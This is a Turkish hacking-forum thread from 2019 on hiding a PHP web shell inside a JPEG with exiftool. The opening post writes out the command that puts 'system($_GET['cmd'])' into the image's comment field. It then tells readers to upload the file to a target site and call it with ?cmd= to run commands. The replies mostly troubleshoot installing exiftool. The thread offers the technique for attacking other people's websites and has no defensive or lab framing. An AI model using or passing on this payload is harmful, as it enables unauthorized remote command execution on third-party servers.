THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

takipci
chat
Seçenekler

EXIFTOOL ile fotoğrafa shell gömme / Siber Güvenlik Kulübü

lovelypeople - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Mesajlar:
29
Konular:
3
Teşekkür (Etti):
39
Teşekkür (Aldı):
6
Ticaret:
(0) %
9
2941
24-06-2019 13:08
#1
EXIFTOOL ile fotoğrafa shell gömme / Siber Güvenlik Kulübü
Not:Eski yöntemdir fazla işe yaramaz ama hala yiyen siteler vardır.

EXIFTOOL indirmek için (Kali Linux)

Kod:
sudo apt-get install exiftool
Fotoğrafın olduğu klasöre girip

Kod:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' fotoismi.jpg
Kodunu yazıyoruz ve hedef siteye upload ediyoruz.Upload ettikten sonra fotoğrafın linkine gidip sonuna ?cmd= ekleyin.
--------------------- Visita Interiorae Terrae Rectificando Invenies Occultum Lapidem
porsukhak Teşekkür etti.
PourLa - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.521
Konular:
293
Teşekkür (Etti):
502
Teşekkür (Aldı):
523
Ticaret:
(0) %
24-06-2019 13:47
#2
Vallah 10 numara konu yararlı Bilmiyenler için ama görselle süslesen çok güzel olurdu
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
lovelypeople - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Mesajlar:
29
Konular:
3
Teşekkür (Etti):
39
Teşekkür (Aldı):
6
Ticaret:
(0) %
24-06-2019 14:35
#3
Alıntı:
PourLa´isimli üyeden Alıntı Mesajı göster
Vallah 10 numara konu yararlı Bilmiyenler için ama görselle süslesen çok güzel olurdu
sağol dostum bir dahakine süsleriz (:
--------------------- Visita Interiorae Terrae Rectificando Invenies Occultum Lapidem
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
856
Konular:
173
Teşekkür (Etti):
16
Teşekkür (Aldı):
121
Ticaret:
(0) %
25-06-2019 17:40
#4
@lovelypeople aşağıdaki hatayı alıyorum ?
Kod:
bash: exiftool: command not found
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
leaks - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2018
Mesajlar:
870
Konular:
20
Teşekkür (Etti):
185
Teşekkür (Aldı):
175
Ticaret:
(0) %
25-06-2019 18:10
#5
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
@lovelypeople aşağıdaki hatayı alıyorum ?
Kod:
bash: exiftool: command not found
Demek ki `exiftool' diye bir şey yüklü değilmiş.
Kod:
apt install exiftool
Yukarıdaki komutla şansınızı deneyebilirsiniz. Repository'de varsa yüklenir, yoksa kaynak kodundan derlemek lazım.
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
856
Konular:
173
Teşekkür (Etti):
16
Teşekkür (Aldı):
121
Ticaret:
(0) %
25-06-2019 18:23
#6
Alıntı:
leaks´isimli üyeden Alıntı Mesajı göster
Demek ki `exiftool' diye bir şey yüklü değilmiş.
Kod:
apt install exiftool
Yukarıdaki komutla şansınızı deneyebilirsiniz. Repository'de varsa yüklenir, yoksa kaynak kodundan derlemek lazım.
@leaks
Kod:
Paket listeleri okunuyor... Bitti
Bağımlılık ağacı oluşturuluyor       
Durum bilgisi okunuyor... Bitti      
Not, 'exiftool' yerine 'libimage-exiftool-perl' seçiliyor
libimage-exiftool-perl zaten en yeni sürümde (11.16-1).
Aşağıdaki paketler otomatik olarak kurulmuş ve artık bu paketlere gerek duyulmuyor:
  acccheck cython3 iotop keepnote libstatgrab10 libstd-rust-1.32 lolcat mg
  python-mockito python-whoosh python3-iso8601 ruby-paint ruby-trollop saidar
  zile
Bu paketleri kaldırmak için 'sudo apt autoremove' komutunu kullanın.
0 paket yükseltilecek, 0 yeni paket kurulacak, 0 paket kaldırılacak ve 0 paket yükseltilmeyecek.
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
leaks - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2018
Mesajlar:
870
Konular:
20
Teşekkür (Etti):
185
Teşekkür (Aldı):
175
Ticaret:
(0) %
25-06-2019 18:40
#7
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
Kod:
cd
git clone https://github.com/exiftool/exiftool.git exiftool
echo "PATH=$PATH:$HOME/exiftool" >> .bashrc
. .bashrc
exiftool exiftool/t/images/ExifTool.jpg
Ekrana uzunca bir çıktı yazdırırsa işlem başarılı demektir.


@injector
Konu leaks tarafından (25-06-2019 18:44 Saat 18:44 ) değiştirilmiştir.
Liserjik - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
08/2018
Yaş:
2
Mesajlar:
2.174
Konular:
190
Teşekkür (Etti):
494
Teşekkür (Aldı):
953
Ticaret:
(0) %
25-06-2019 18:41
#8
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
@leaks
Kod:
Paket listeleri okunuyor... Bitti
Bağımlılık ağacı oluşturuluyor       
Durum bilgisi okunuyor... Bitti      
Not, 'exiftool' yerine 'libimage-exiftool-perl' seçiliyor
libimage-exiftool-perl zaten en yeni sürümde (11.16-1).
Aşağıdaki paketler otomatik olarak kurulmuş ve artık bu paketlere gerek duyulmuyor:
  acccheck cython3 iotop keepnote libstatgrab10 libstd-rust-1.32 lolcat mg
  python-mockito python-whoosh python3-iso8601 ruby-paint ruby-trollop saidar
  zile
Bu paketleri kaldırmak için 'sudo apt autoremove' komutunu kullanın.
0 paket yükseltilecek, 0 yeni paket kurulacak, 0 paket kaldırılacak ve 0 paket yükseltilmeyecek.
Kod:
apt install git && apt install perl && git clone https://github.com/exiftool/exiftool.git
Kod:
perl exiftool/exiftool ornek.jpg
--------------------- : )
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
856
Konular:
173
Teşekkür (Etti):
16
Teşekkür (Aldı):
121
Ticaret:
(0) %
25-06-2019 18:44
#9
Alıntı:
Liserjik´isimli üyeden Alıntı Mesajı göster


Kod:
apt install git && apt install perl && git clone https://github.com/exiftool/exiftool.git
Kod:
perl exiftool/exiftool ornek.jpg
fotoğraf hakkında bilgi veriyor içine shell gömülmüyor ? @liserjiik
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
Liserjik - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
08/2018
Yaş:
2
Mesajlar:
2.174
Konular:
190
Teşekkür (Etti):
494
Teşekkür (Aldı):
953
Ticaret:
(0) %
25-06-2019 18:52
#10
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
fotoğraf hakkında bilgi veriyor içine shell gömülmüyor ? @liserjiik
Örnek olarak kurulum ve çalışıp çalışmadığını anlamanız için yazmıştım ve yolunu veridiğiniz grafik dosyasının exif bilgilerini gördüğünüze göre başarılı.

Shell kısmı konuya ait.
Kod:
https://www.turkhackteam.org/8818454-post1.html
--------------------- : )

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler





1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291